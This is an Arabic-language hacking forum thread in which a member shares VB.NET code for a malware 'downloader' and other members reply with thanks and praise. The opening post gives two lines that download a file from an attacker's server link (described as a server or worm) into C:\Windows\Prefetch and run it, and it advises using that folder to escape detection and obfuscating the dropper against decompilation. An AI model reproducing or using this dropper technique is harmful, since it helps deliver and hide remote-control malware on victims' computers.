حالة الموضوع:
مغلق
  1. samo dz

    samo dz Developer

    الأنتساب:
    ‏18 أكتوبر 2014
    المشاركات:
    71
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    8
    ساطرح هدا الكود لدواندولر vb.net بحجم 12kb بعد ان تنزع الايقونة لدي برنامجي dowandoler مع خاصية usb spred و add to startup لكن لن اطرحه حتى لا يقولون ملغم لهدا بدات اضع الاكوادشرح الكود : الكود يقوم بتحميل الرابط المباشر لسيرفرك او اي شيء اخر الى الملف الدي تختاره انت اظن ان عليك ان تختار C:\Windows\Prefetch لان كاشف التلغيم لن يفكر في ملف preftch كمسار للنزول شفر الدواندولر حتى لا يمكن تحليله ب.net reflector
    يمكنك ان تضيف الكود في الفورم او الكلاس او بوتون
    كود:
     My.Computer.Network.DownloadFile("رابط المباشر للسيرفر او الدودة", "C:\Windows\Prefetch\server.exe")
            Process.Start("C:\Windows\Prefetch\server.exe")
    ادا واجهتم مشكلة في الكود اسالني
    ارجو التفييم حتى اصعد في الرتبة و افيدكم اكتر
     
  2. Zero Team

    Zero Team Developer

    الأنتساب:
    ‏20 يوليو 2012
    المشاركات:
    84
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    الرياض ّ!
    رد: برمج دواندولر بنفسك لاي صيغة vb.net

    ممكن شرح مصور حبيبي
     
  3. samo dz

    samo dz Developer

    الأنتساب:
    ‏18 أكتوبر 2014
    المشاركات:
    71
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    8
    رد: برمج دواندولر بنفسك لاي صيغة vb.net

    هل لديك visual basic
     
  4. snoopi

    snoopi Developer

    الأنتساب:
    ‏28 أكتوبر 2014
    المشاركات:
    3
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: برمج دواندولر بنفسك لاي صيغة vb.net

    :{1!}: شكرا اخي العزيز على الافادة
    {1!@}​
     
  5. Gaza-Dz

    Gaza-Dz Support - Iq-Team

    الأنتساب:
    ‏26 مايو 2013
    المشاركات:
    1,821
    الإعجابات المتلقاة:
    87
    نقاط الجائزة:
    48
    الجنس:
    ذكر
    الوظيفة:
    DZ
    الإقامة:
    DZ
    رد: برمج دواندولر بنفسك لاي صيغة vb.net

    السلام عليكم ورحمة الله
    بوركت اخي سامو
    يعطيك الصحة ​
     
  6. SiL3nT M4n

    SiL3nT M4n Developer

    الأنتساب:
    ‏19 مايو 2012
    المشاركات:
    55
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الإقامة:
    im Syrian
    رد: برمج دواندولر بنفسك لاي صيغة vb.net

    مشكور اخي جاري التجربه {1$0}
     
  7. المعاقب الصدري

    المعاقب الصدري V • I • P

    الأنتساب:
    ‏20 يوليو 2014
    المشاركات:
    924
    الإعجابات المتلقاة:
    681
    نقاط الجائزة:
    93
    الجنس:
    ذكر
    رد: برمج دواندولر بنفسك لاي صيغة vb.net

    احسنت مبدع
     
  8. Ameer Eagle

    Ameer Eagle V • I • P

    الأنتساب:
    ‏7 يونيو 2014
    المشاركات:
    3,233
    الإعجابات المتلقاة:
    2,779
    نقاط الجائزة:
    113
    الجنس:
    ذكر
    الوظيفة:
    Student
    الإقامة:
    IraQ
    رد: برمج دواندولر بنفسك لاي صيغة vb.net

    السلام عليكم ورحمة الله ...
    عاشت الايادي بارك الله بيك
    وبالنسبة الى البرنامج اخي لا تقلق كان هنالك سوء فهم صغير حصل ولقدد قم اصلاحه والحمد لله لهذا تابع طريقك يا غالي موفق
     
  9. Mr-TiGeR

    Mr-TiGeR موقوف لمخالفة الشروط

    الأنتساب:
    ‏8 أكتوبر 2014
    المشاركات:
    79
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:
    8
    رد: برمج دواندولر بنفسك لاي صيغة vb.net

    يعطيكك الفف عافيةة اخوي سآموو ~

    واذا كنت زعلان علي انا اسسف جدآ

    ً#ٌ5oًًًُ.:{11}:
     
  10. slaizer

    slaizer مشرف أختبار الأختراق V • I • P

    الأنتساب:
    ‏29 يوليو 2014
    المشاركات:
    607
    الإعجابات المتلقاة:
    551
    نقاط الجائزة:
    93
    الجنس:
    ذكر
    رد: برمج دواندولر بنفسك لاي صيغة vb.net

    مبدع[​IMG][​IMG][​IMG][​IMG]
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة